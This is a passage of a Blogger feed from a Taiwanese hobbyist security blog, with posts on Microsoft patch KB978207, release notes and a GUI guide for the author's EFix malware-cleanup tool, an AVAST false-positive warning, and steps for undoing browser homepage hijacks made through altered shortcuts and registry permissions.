/&gt;由於攻擊原碼已流出，所以請務必更新&lt;br /&gt;&lt;br /&gt;位置：&lt;br /&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&amp;amp;FamilyID=207eecad-6e84-48e6-ae18-6794a3618ee0"&gt;http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&amp;amp;FamilyID=207eecad-6e84-48e6-ae18-6794a3618ee0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;不過這漏洞總覺得和對岸攻擊GOOGLE有甚麼關係？&lt;br /&gt;聽起來像是利用有掛使用這漏洞惡意程式的網站去取得個人資料之後&lt;br /&gt;在進行偷竊個人資料...只是偷資料是偷使用GOOGLE服務相關的資料&lt;br /&gt;這個不是很多都有？&lt;br /&gt;&lt;br /&gt;不過我也不是很清楚情形就是，不管怎麼說更新出了趕快先更新吧&lt;br /&gt;尤其是台灣這邊那麼多人還在用IE，加上非正版使用者多導至很多人都不更新的&lt;br /&gt;這樣是很危險的.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3100408071318321390?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3100408071318321390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3100408071318321390'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/kb978207.html' title='微軟 KB978207 安全性更新'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6684530915443961052</id><published>2010-01-20T14:38:00.000+08:00</published><updated>2010-01-20T14:38:08.186+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>有關EFix 5.5 GUI 修改需注意的地方</title><content type='html'>基本上因為是改用AUTOIT的關係&lt;br /&gt;所以在設計上面會比較精簡一點&lt;br /&gt;&lt;br /&gt;這邊就大概說明一下視窗的用途&lt;br /&gt;&lt;br /&gt;首先看主頁面&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_XPrN8EVFxI4/S1afeapCXDI/AAAAAAAAAYw/B_ck8kwHru4/s1600-h/EF55GUI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="507" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/S1afeapCXDI/AAAAAAAAAYw/B_ck8kwHru4/s640/EF55GUI.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;界面很精簡.....說真的我個人也覺得精簡點好&lt;br /&gt;不然都沒人看的懂怎麼用....雖然說現在應該也沒幾個人知道怎麼用&lt;br /&gt;&lt;br /&gt;上面工作列主選單的選項是對應到下方那一排按鈕的&lt;br /&gt;如果說按鈕不方便按的話就可以使用上方工具列處理&lt;br /&gt;&lt;br /&gt;再來是選項部分&lt;br /&gt;選項部分有兩個選項&lt;br /&gt;一個是只使用系統分析&lt;br /&gt;一個是開啟用延伸系統分析&lt;br /&gt;&lt;br /&gt;只使用系統分析為當您不想要使用EFix自帶的清除腳本動作，但需要檢查系統報告時可使用此選項&lt;br /&gt;這一個選項選取後按開始會直接跳過系統自帶腳本部分而進行系統分析&lt;br /&gt;這樣對不太喜歡預設那爛爛的自動化腳本的人會比較方便一點&lt;br /&gt;&lt;br /&gt;再來是啟用延伸系統分析&lt;br /&gt;延伸系統分析是增加掃描以下幾個地方&lt;br /&gt;&lt;br /&gt;1.新增/移除程式的資料&lt;br /&gt;2.Windows更新資料&lt;br /&gt;3.系統事件日誌&lt;br /&gt;&lt;br /&gt;對需追蹤這些地方的人有幫助&lt;br /&gt;不過...就我目前看應該是沒有人需要用到才是.&lt;br /&gt;&lt;br /&gt;?這一個選項就是讀我資訊和連到這個BLOG&lt;br /&gt;&lt;br /&gt;再來提到左半邊的按鈕&lt;br /&gt;&lt;br /&gt;開始和取消就不提了，用途就是字面那個意思&lt;br /&gt;而自訂腳本和之前一樣，位置換到右邊而已&lt;br /&gt;比較需要提而且一般人會用到的是自動播放選項和資料夾還原選項&lt;br /&gt;&lt;br /&gt;自動播放選項如下圖&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_XPrN8EVFxI4/S1aizAYD3AI/AAAAAAAAAY4/JkzyOyyhW_M/s1600-h/EF55GUI1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="507" src="http://4.bp.blogspot.com/_XPrN8EVFxI4/S1aizAYD3AI/AAAAAAAAAY4/JkzyOyyhW_M/s640/EF55GUI1.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;基本上使用方式和前面幾版一樣，同樣是使用關閉MOUNTPOINT2的方式&lt;br /&gt;這邊如果說在下載相關工具SWREG失敗時，按鈕會反白無法選取&lt;br /&gt;而在Win7時則直接無法選取&lt;br /&gt;&lt;br /&gt;再來是修改最多的資料夾還原選項&lt;br /&gt;資料夾還原選項如下圖：&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_XPrN8EVFxI4/S1ajbVP4qHI/AAAAAAAAAZA/vFx68NwVLbo/s1600-h/EF55GUI2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="506" src="http://2.bp.blogspot.com/_XPrN8EVFxI4/S1ajbVP4qHI/AAAAAAAAAZA/vFx68NwVLbo/s640/EF55GUI2.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;這一個視窗和前一版差別很多&lt;br /&gt;現在會直接將系統所有在跟目錄位置下帶隱藏屬性的資料夾顯示出來&lt;br /&gt;而顯示出來後要怎麼還原？&lt;br /&gt;就是對準該項目按滑鼠右鍵&lt;br /&gt;會出現還原選項，如下圖：&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_XPrN8EVFxI4/S1akKUVBvrI/AAAAAAAAAZI/g0Ej7eLHHic/s1600-h/EF55GUI3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="508" src="http://3.bp.blogspot.com/_XPrN8EVFxI4/S1akKUVBvrI/AAAAAAAAAZI/g0Ej7eLHHic/s640/EF55GUI3.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;裡面帶有兩個選項，一個是還原屬性，一個是包含子資料夾&lt;br /&gt;一般來說不建議使用包含子資料夾，除非你確定那個資料夾裡面的所有檔案都有被隱藏才使用&lt;br /&gt;不然一般使用還原屬性即可&lt;br /&gt;而當按下還原後，馬上就將全部屬性去除掉。&lt;br /&gt;也就是說修改成即時性的.&lt;br /&gt;這樣圖形化操作應該是會比較容易理解.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;上述為本次版本更新GUI的修改事項&lt;br /&gt;有甚麼樣的使用問題可以到PTT找我&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6684530915443961052?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6684530915443961052'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6684530915443961052'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/efix-55-gui.html' title='有關EFix 5.5 GUI 修改需注意的地方'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_XPrN8EVFxI4/S1afeapCXDI/AAAAAAAAAYw/B_ck8kwHru4/s72-c/EF55GUI.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1989897030340555821</id><published>2010-01-20T13:50:00.002+08:00</published><updated>2010-01-20T13:54:35.103+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.5 20100120.01</title><content type='html'>版本：5.5 20100120.01&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 1219350 bytes&lt;br /&gt;MD5...: 088b24df26151ab41796e98b138fa437&lt;br /&gt;SHA1..: f2cc6b6c2bd363f24abc0945af6e47f1dfbd5f31&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 RC1 7100&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 家用版 &amp;lt;-- 感謝中毒網友提供測試XD&lt;br /&gt;Windows Vista SP1 &amp;lt;-- 感謝中毒網友提供測試XD&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;移除第三方工具CURL MOVEEX CRC32 MD5DEEP MSHTA FILEVER&lt;br /&gt;移除SCRIPT GUI使用的相關檔案&lt;br /&gt;新增檔案EFTOOL ( 使用AUTOIT製作的自製工具 )&lt;br /&gt;修改GUI界面，原本使用HTML現在改用AUTOIT繪製&lt;br /&gt;新增刪除檔案&lt;br /&gt;新增刪除部分不安全的NAMESPACE ( 對應桌面上可能產生的一些怪異圖示清除 )&lt;br /&gt;新增檢測以下資料夾並列舉捷徑 ( 不做刪除因為無法判斷使用者會不會需要用到，同樣對應捷徑首頁綁架法而做的 )&lt;br /&gt;&lt;ul&gt;&lt;li&gt;USER桌面&lt;/li&gt;&lt;li&gt;ALLUSER桌面&lt;/li&gt;&lt;li&gt;快速啟動資料夾&lt;/li&gt;&lt;li&gt;開始 -&amp;gt; 程式集資料夾&lt;/li&gt;&lt;/ul&gt;新增檢測部分登錄值，這邊就不列舉了&lt;br /&gt;修正部分BUG。&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------&lt;br /&gt;註1：特別感謝 AVPCLUB 如夢似幻 協助測試除錯&lt;br /&gt;以及巴哈姆特 wellss 提供AUTOIT相關說明文件以及資訊提供.&lt;br /&gt;&lt;br /&gt;註2：一樣是不支援X64，沒作業系統可以測...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1989897030340555821?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1989897030340555821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1989897030340555821'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/efix-ver-55-2010012001.html' title='EFix Ver 5.5 20100120.01'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-9144168144169671581</id><published>2010-01-17T13:27:00.000+08:00</published><updated>2010-01-17T13:27:27.905+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>下載連結換空間</title><content type='html'>因為之前直接放HINET連結結果造成自訂腳本執行速度會變慢 ( 因為要花時間去下載檔案 )&lt;br /&gt;所以原本的連結取消，改用免空的空間。&lt;br /&gt;不便之處還請見諒&lt;br /&gt;&lt;br /&gt;---------------------------------------------&lt;br /&gt;不過就我目前觀察是沒人在乎的...XD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-9144168144169671581?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9144168144169671581'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/9144168144169671581'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/blog-post_17.html' title='下載連結換空間'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3884832154304312095</id><published>2010-01-09T19:52:00.003+08:00</published><updated>2010-01-09T19:58:27.653+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20100109.34</title><content type='html'>版本： 5.3 20100109.34&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 1124303 bytes&lt;br /&gt;MD5   : 72d5c737b2c032bec1d98e3fbf767373&lt;br /&gt;SHA1  : 8b1506e234e83b23f5f7469530d563b82ade303f&lt;br /&gt;&lt;br /&gt;測試過的作業系統&lt;br /&gt;Windows 7 RC1&lt;br /&gt;Windows XP SP2 SP3&lt;br /&gt;&lt;br /&gt;修改事項&lt;br /&gt;修正自訂腳本DEL DRIVER::指令驅動項目使用大寫會失效的問題&lt;br /&gt;修改偵測EXPLORER\NAMESPACE登錄值的方式&lt;br /&gt;新增數位簽章檢查失敗的檔案列舉MD5和CRC32數值&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3884832154304312095?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3884832154304312095'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3884832154304312095'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/efix-ver-53-2010010934.html' title='EFix Ver 5.3 20100109.34'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4530062493487840615</id><published>2010-01-05T17:16:00.003+08:00</published><updated>2010-01-05T17:24:40.309+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix Ver 5.3 20100105.31</title><content type='html'>版本： 5.3 20100105.31&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size: 1123558 bytes&lt;br /&gt;MD5...: bf14af5631cc816c7e3fdd727245b3b9&lt;br /&gt;SHA1..: 5b843d57783fba3a01f14a2339620bb37bc01696&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP XP2&lt;br /&gt;Windows 7 RC1&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修改RESET REG::腳本指令無效的問題&lt;br /&gt;系統分析新增加掃描桌面資料夾，程式集資料夾，快速啟動列資料夾的所有捷徑檔&lt;br /&gt;並列舉參數出來，這是對應首頁綁架用的&lt;br /&gt;系統分析新增掃描桌面假IE圖示對應的CLSID值&lt;br /&gt;同樣是對應首頁綁架用的&lt;br /&gt;增加一點刪除檔案 ( 真的只有一點... )&lt;br /&gt;&lt;br /&gt;備註1：&lt;br /&gt;目前正在著手修改部分主架構，將一些本來是使用第三方工具的軟體改用自己寫的AUTOIT主檔，不過碰到了很多問題...所以目前主力是放在那邊&lt;br /&gt;5.3版的基本上除非有特別需求不然應該是不會有太頻繁的更動才是.&lt;br /&gt;&lt;br /&gt;備註2：&lt;br /&gt;數位簽章列舉MD5值來不及加上去0rz&lt;br /&gt;等有空吧..&lt;br /&gt;&lt;br /&gt;這邊特別感謝AVPCLUB的如夢似幻提供了不少樣本供測試以及除錯測試.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4530062493487840615?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4530062493487840615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4530062493487840615'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/efix-ver-53-2010010531.html' title='EFix Ver 5.3 20100105.31'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2771372576029186620</id><published>2010-01-01T00:21:00.005+08:00</published><updated>2010-01-01T00:52:33.094+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>另外提醒首頁綁架</title><content type='html'>最近常碰到的東西是首頁綁架&lt;br /&gt;不瞞各位說我自己這一台都中招了XD&lt;br /&gt;&lt;br /&gt;甚麼時候中的不知道&lt;br /&gt;今天抽空測試EFix的時候才發現首頁被修改&lt;br /&gt;應該是在查資料的時候連的大陸網站中的&lt;br /&gt;確實不簡單.&lt;br /&gt;&lt;br /&gt;不過手法只是很簡單的作一個參數修改而已&lt;br /&gt;沒有值入任何惡意程式&lt;br /&gt;所以將參數修改回去就好了&lt;br /&gt;&lt;br /&gt;既然連我都中了那我想就提一下這一個首頁綁架的特性好了&lt;br /&gt;&lt;br /&gt;現在大陸那邊的綁架首頁比較流行的方式是修改幾個地方&lt;br /&gt;&lt;br /&gt;1.將快速啟動列、桌面和程式集的INTERNET EXPLORER捷徑作一個增加參數的修改&lt;br /&gt;&lt;br /&gt;比如像底下：&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_XPrN8EVFxI4/SzzR3rnsraI/AAAAAAAAAXs/jvgc2gTx6ro/s1600-h/IE1.jpg"&gt;&lt;img style="cursor: pointer; width: 333px; height: 400px;" src="http://1.bp.blogspot.com/_XPrN8EVFxI4/SzzR3rnsraI/AAAAAAAAAXs/jvgc2gTx6ro/s400/IE1.jpg" alt="" id="BLOGGER_PHOTO_ID_5421438805979475362" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;正常來說應該是這樣&lt;br /&gt;然而惡意網站會將該捷徑修改成如下圖&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_XPrN8EVFxI4/SzzSZSaBVBI/AAAAAAAAAX0/1a2GyLC10A0/s1600-h/IE2.jpg"&gt;&lt;img style="cursor: pointer; width: 335px; height: 400px;" src="http://1.bp.blogspot.com/_XPrN8EVFxI4/SzzSZSaBVBI/AAAAAAAAAX0/1a2GyLC10A0/s400/IE2.jpg" alt="" id="BLOGGER_PHOTO_ID_5421439383326774290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;有注意到嗎？&lt;br /&gt;IEXPLORE.EXE後方多了一個網址&lt;br /&gt;在該捷徑來說就是在開啓IE時直接開啓http://www.google.com.tw這個網站&lt;br /&gt;&lt;br /&gt;利用捷徑盲點達到所謂的綁架目的&lt;br /&gt;這一種的處理方式基本上就是刪除重建就好了&lt;br /&gt;但要注意一點就是就目前來說所碰到的&lt;br /&gt;會大多將這一個捷徑檔的刪除權限去除掉&lt;br /&gt;所以在刪除檔案前要先將權限回復.&lt;br /&gt;&lt;br /&gt;2.修改首頁登錄值後將權限修改成只能讀取登錄值不能刪除&lt;br /&gt;INTERNER EXPLORER的首頁位置在&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer&lt;br /&gt;底下的MAIN值內&lt;br /&gt;一般是修改這邊達到綁架的效果&lt;br /&gt;不過這邊也會被上權限達到無法修改的效果&lt;br /&gt;&lt;br /&gt;處理的方式&lt;br /&gt;先開啓登錄編輯器移到&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer登錄值中&lt;br /&gt;之後選右鍵找使用權限點進去&lt;br /&gt;在將EVERYONE補上去並修改成一般可讀寫權限後再去修改&lt;br /&gt;怎麼修改可以爬一下我之前發的文&lt;br /&gt;&lt;br /&gt;3.增加一個或多個CLSID值並對應到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace中&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 這一個登錄值位置對應到桌面上&lt;br /&gt;像是資源回收桶這一種非捷徑的圖示都是從這邊定義&lt;br /&gt;&lt;br /&gt;基本上這邊的值都固定那幾個&lt;br /&gt;只要將增加的值刪除即可&lt;br /&gt;不知道原本的值的話&lt;br /&gt;可以到該值去找&lt;br /&gt;只要看到是亂碼的，就刪吧XD&lt;br /&gt;&lt;br /&gt;這邊比較複雜不是很想說太多..&lt;br /&gt;&lt;br /&gt;目前大陸那邊比較流行的純首頁綁架方式 (就不種惡意程式純綁你首頁) 大致上是這三種方式&lt;br /&gt;&lt;br /&gt;以上這三種請各位自己多小心&lt;br /&gt;可以的話請盡量使用非IE瀏覽器連網路&lt;br /&gt;可以的話最好連FIREFOX也避免...不過那不可能的事XD&lt;br /&gt;FIREFOX還是有很大的優勢這沒辦法..&lt;br /&gt;&lt;br /&gt;--------------------------------------------&lt;br /&gt;另外以後的趨勢是針對adobe的相關產品做攻擊&lt;br /&gt;adobe的一些東西弱點不少，請各位多加小心了.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2771372576029186620?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2771372576029186620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2771372576029186620'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/blog-post.html' title='另外提醒首頁綁架'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_XPrN8EVFxI4/SzzR3rnsraI/AAAAAAAAAXs/jvgc2gTx6ro/s72-c/IE1.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-7594356424580317584</id><published>2010-01-01T00:17:00.002+08:00</published><updated>2010-01-01T00:20:25.095+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>2010年</title><content type='html'>2010年了。&lt;br /&gt;祝大家新年心想事成萬事如意&lt;br /&gt;病毒不要來&lt;br /&gt;用不到EFix XD&lt;br /&gt;&lt;br /&gt;-------------------------------------&lt;br /&gt;2010年過年中有空檔繼續寫EFix ... 0rz&lt;br /&gt;AUTOIT執行效率不太好.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-7594356424580317584?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7594356424580317584'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/7594356424580317584'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/01/2010.html' title='2010年'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6913603583778005907</id><published>2009-12-23T00:36:00.002+08:00</published><updated>2009-12-23T00:51:28.801+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>最近時間實在不夠...0rz</title><content type='html'>最近年底到了公司CASE超級多..&lt;br /&gt;結果根本沒辦法去作EFix的修改&lt;br /&gt;&lt;br /&gt;結果昨天趁中午時間大概看了一下源碼發現自己都快看不懂了0rz&lt;br /&gt;也因此想說做一些大改變，只不過有時間再說吧...&lt;br /&gt;&lt;br /&gt;基本上目前EFix更新的進度如下：&lt;br /&gt;&lt;br /&gt;原本修改的進度 = 增加十行左右代碼... ( 有網友希望能夠有的登錄值權限還原這一個放進去了 )&lt;br /&gt;新增加功能 = 0&lt;br /&gt;&lt;br /&gt;不過由於目前有接觸到AUTOIT腳本，在大概接觸了一下後發現是可以用的&lt;br /&gt;所以目前是打算做一個大修改，將原本使用CMD腳本修改成為使用AUTOIT腳本來處理&lt;br /&gt;這樣的好處是可以去掉大多數第三方工具，如果使用上能夠更得心應手的話甚至有機會可以做到&lt;br /&gt;完全不打包任何第三方工具&lt;br /&gt;假設做到這一點的話，那X64支援就有可能了，AUTOIT編譯時可以使用X64.&lt;br /&gt;只是目前做不到...&lt;br /&gt;&lt;br /&gt;但上面所提到的東西全部都必須等我有時間才行....0rz&lt;br /&gt;&lt;br /&gt;今年我看大概是沒機會了.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6913603583778005907?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6913603583778005907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6913603583778005907'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/12/0rz.html' title='最近時間實在不夠...0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8839666377580250141</id><published>2009-12-03T16:31:00.002+08:00</published><updated>2009-12-03T16:42:58.394+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>AVAST 的嚴重誤判</title><content type='html'>雖然已經出修補程式了啦，不過還是提一下&lt;br /&gt;&lt;br /&gt;有使用AVAST防毒軟體的人&lt;br /&gt;如果說您看到您的病毒庫資料為2009-12-03-0的&lt;br /&gt;請務必更新您的病毒碼至更新版狀態&lt;br /&gt;&lt;br /&gt;目前所知AVAST 2009-12-03-0的病毒資料庫會誤判大部分應用程式&lt;br /&gt;造成刪除後系統崩潰的情形發生.&lt;br /&gt;&lt;br /&gt;基本上我個人是覺得不要去怪他。&lt;br /&gt;這種情形基本上每一間防毒廠商或多或少都有發生過&lt;br /&gt;加強自己對自己系統的認知才能避免當誤判情形出現時因不清楚情形造成系統崩潰的狀況發生&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8839666377580250141?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8839666377580250141'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8839666377580250141'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2009/12/avast.html' title='AVAST 的嚴重誤判'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1696501693989797674</id><published>2009-12-02T20:06:00.001+08:00</published><updated>2009-12-02T20:07:08.411+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>增加一個下載連結</title><content type='html'>便當狗這幾天掛了，所以增加一個megaupload空間的連結&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1696501693989797674?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1696501693989797674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1696501693989797674'/><link rel='alternate' type='text/html' 